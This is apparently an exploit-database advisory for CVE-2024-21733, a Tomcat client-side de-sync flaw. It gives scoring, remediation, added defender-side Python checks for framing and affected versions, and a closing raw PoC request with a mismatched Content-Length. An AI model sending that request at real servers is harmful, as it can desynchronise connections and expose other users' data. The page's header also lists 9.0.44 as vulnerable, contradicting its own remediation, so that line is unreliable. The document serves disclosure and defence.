Apache Tomcat 8.5.63 / 9.0.43 HTTP Response Smuggling Vulnerability

Source: 0day.today (1337DAY-ID-39294)
Author: xer0dayz
Published: 2024-02-01 00:00:00
Tags: apache tomcat 8.5, apache tomcat 9.0, http response smuggling, vulnerability, cve-2024-21733, client-side de-sync, upgrade, security advisory, xer0dayz, sn1persecurity llc, proton mail

CVSS3: 5.3 Medium
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: LOW
Integrity Impact: NONE
Availability Impact: NONE

AI Score: 5.6 Medium (Confidence: High)
EPSS: 0.007 Low (Percentile: 80.3%)

Apache Tomcat suffers from a client-side de-sync vulnerability via HTTP request smuggling. Apache Tomcat versions 8.5.7 through 8.5.63 and 9.0.0-M11 through 9.0.43 are vulnerable.

# Exploit Title: CVE-2024-21733 Apache Tomcat HTTP Request Smuggling
# Date: 1/31/2024
# Exploit Author: xer0dayz
# Vendor Homepage: https://tomcat.apache.org/
# Software Link: https://tomcat.apache.org/
# Version: 8.5.7 to 8.5.63 or 9.0.44 or later
# CVE : CVE-2024-21733

## Description:
Apache Tomcat versions 8.5.7 through 8.5.63 and 9.0.0-M11 through 9.0.43 are vulnerable to client-side de-sync attacks.

Client-side de-sync (CSD) vulnerabilities occur when a web server fails to correctly process the Content-Length of POST requests. By exploiting this behavior, an attacker can force a victim's browser to de-synchronize its connection with the website, allowing sensitive data to be smuggled across the server and/or client connections.
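The core of the issue is the disagreement between the Content-Length a request announces and the bytes that actually follow the headers. The following check, written here as an added defender-side example and not part of the advisory or of Tomcat itself, parses a raw HTTP/1.1 request, compares the declared Content-Length with the body present, and reports the framing ambiguities a proxy or WAF would want to flag (length mismatch, duplicate Content-Length, Content-Length together with Transfer-Encoding). The two sample requests are constructed for this example; the first mirrors the shape of the advisory's PoC (six bytes declared, one byte sent) with a hypothetical host name.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample (not the advisory's PoC verbatim): the headers announce
# a 6-byte body but only one byte follows the blank line.
SHORT_BODY_REQUEST = (
    b"POST / HTTP/1.1\r\n"
    b"Host: tomcat.example.test\r\n"          # hypothetical host
    b"Connection: keep-alive\r\n"
    b"Content-Length: 6\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"\r\n"
    b"X"
)

# Constructed well-formed request for comparison: declared and actual lengths agree.
WELL_FORMED_REQUEST = (
    b"POST / HTTP/1.1\r\n"
    b"Host: tomcat.example.test\r\n"
    b"Content-Length: 3\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"\r\n"
    b"a=1"
)


@dataclass
class FramingReport:
    method: str
    declared_length: Optional[int]
    actual_body_length: int
    findings: List[str] = field(default_factory=list)

    @property
    def consistent(self) -> bool:
        """True when the framing headers and the body agree."""
        return not self.findings


def parse_request(raw: bytes) -> Tuple[str, List[Tuple[str, str]], bytes]:
    """Split a raw HTTP/1.1 request into (method, [(name, value), ...], body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("request has no end-of-headers CRLFCRLF")
    lines = head.split(b"\r\n")
    method = lines[0].decode("latin-1").split(" ", 1)[0]
    headers: List[Tuple[str, str]] = []
    for line in lines[1:]:
        name, colon, value = line.decode("latin-1").partition(":")
        if not colon:
            raise ValueError(f"malformed header line: {line!r}")
        headers.append((name.strip().lower(), value.strip()))
    return method, headers, body


def check_request_framing(raw: bytes) -> FramingReport:
    """Report every way the request's framing headers disagree with its body."""
    method, headers, body = parse_request(raw)
    cl_values = [v for n, v in headers if n == "content-length"]
    te_values = [v for n, v in headers if n == "transfer-encoding"]
    report = FramingReport(method=method, declared_length=None,
                           actual_body_length=len(body))

    if len(cl_values) > 1:
        report.findings.append("multiple Content-Length headers")
    if cl_values and te_values:
        report.findings.append("Content-Length and Transfer-Encoding both present")
    if cl_values:
        if re.fullmatch(r"[0-9]+", cl_values[0]):
            report.declared_length = int(cl_values[0])
        else:
            report.findings.append(f"non-numeric Content-Length {cl_values[0]!r}")

    declared = report.declared_length
    if declared is not None and not te_values:
        if declared > len(body):
            report.findings.append(
                f"Content-Length {declared} exceeds the {len(body)} body bytes present; "
                "a server honouring it keeps the connection waiting for the rest")
        elif declared < len(body):
            report.findings.append(
                f"{len(body) - declared} body bytes beyond Content-Length {declared}; "
                "a server honouring it treats them as the start of the next request")
    return report


if __name__ == "__main__":
    for raw in (SHORT_BODY_REQUEST, WELL_FORMED_REQUEST):
        r = check_request_framing(raw)
        print(r.method, r.declared_length, r.actual_body_length, r.findings or "ok")
```

Run on captured request bytes, the report tells you whether the declared and actual framing agree; on a keep-alive connection a mismatch in either direction is exactly the condition under which one side's view of where a request ends stops matching the other's.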

## Remediation:
Users are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue.
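Deciding whether an installed Tomcat falls inside the affected ranges is fiddly because the 9.0 range starts at a milestone build (9.0.0-M11), which must sort before the final 9.0.0 release. The following version check is an added example, not tooling from the advisory or the Tomcat project; the ranges and fixed versions are those stated above, and the parser accepts both the "9.0.0-M11" spelling used in the advisory and a "9.0.0.M11" spelling (assumed here as an alternative form).

```python
import re
from typing import Optional, Tuple

# Affected ranges as stated in the advisory (inclusive at both ends).
AFFECTED_RANGES = (
    ("8.5.7", "8.5.63"),
    ("9.0.0-M11", "9.0.43"),
)
# First fixed release on each branch, per the advisory.
FIXED_VERSIONS = ("8.5.64", "9.0.44")

# Accept "x.y.z" and "x.y.z-Mn" (as written in the advisory) or "x.y.z.Mn".
VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:[-.]M(\d+))?$")


def parse_tomcat_version(text: str) -> Tuple[int, int, int, int, int]:
    """Turn '8.5.63' or '9.0.0-M11' into a tuple that sorts in release order.

    Milestone builds precede the final release with the same number, so the
    fourth element is 0 for a milestone and 1 for a final release; the fifth
    is the milestone number (0 for a final release).
    """
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised Tomcat version string: {text!r}")
    major, minor, patch, milestone = m.groups()
    if milestone is None:
        return (int(major), int(minor), int(patch), 1, 0)
    return (int(major), int(minor), int(patch), 0, int(milestone))


def is_affected(version: str) -> bool:
    """True when `version` lies inside one of the advisory's affected ranges."""
    v = parse_tomcat_version(version)
    return any(parse_tomcat_version(lo) <= v <= parse_tomcat_version(hi)
               for lo, hi in AFFECTED_RANGES)


def recommended_upgrade(version: str) -> Optional[str]:
    """Fixed release on the same branch if `version` is affected, else None."""
    if not is_affected(version):
        return None
    major, minor = parse_tomcat_version(version)[:2]
    for fixed in FIXED_VERSIONS:
        if parse_tomcat_version(fixed)[:2] == (major, minor):
            return fixed
    return None


if __name__ == "__main__":
    for v in ("8.5.6", "8.5.7", "8.5.63", "8.5.64", "9.0.0-M10", "9.0.0-M11",
              "9.0.0", "9.0.43", "9.0.44"):
        print(f"{v:10} affected={is_affected(v)!s:5} upgrade_to={recommended_upgrade(v)}")
```

The check only knows the two ranges the advisory lists; a version on a branch the advisory does not mention is reported as not affected, which is a statement about this advisory and not a general assurance.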

## Credit:
This vulnerability was reported responsibly to the Tomcat security team by xer0dayz from Sn1perSecurity LLC.

## History:
2024-01-19 Original advisory

## Full Security Advisory: https://lists.apache.org/thread/h9bjqdd0odj6lhs2o96qgowcc6hb0cfz

## Full Write-Up: https://sn1persecurity.com/wordpress/cve-2024-21733-apache-tomcat-http-request-smuggling/

## PoC/Exploit:

POST / HTTP/1.1
Host: hostname
Sec-Ch-Ua: "Chromium";v="119", "Not?A_Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: keep-alive
Content-Length: 6
Content-Type: application/x-www-form-urlencoded
X

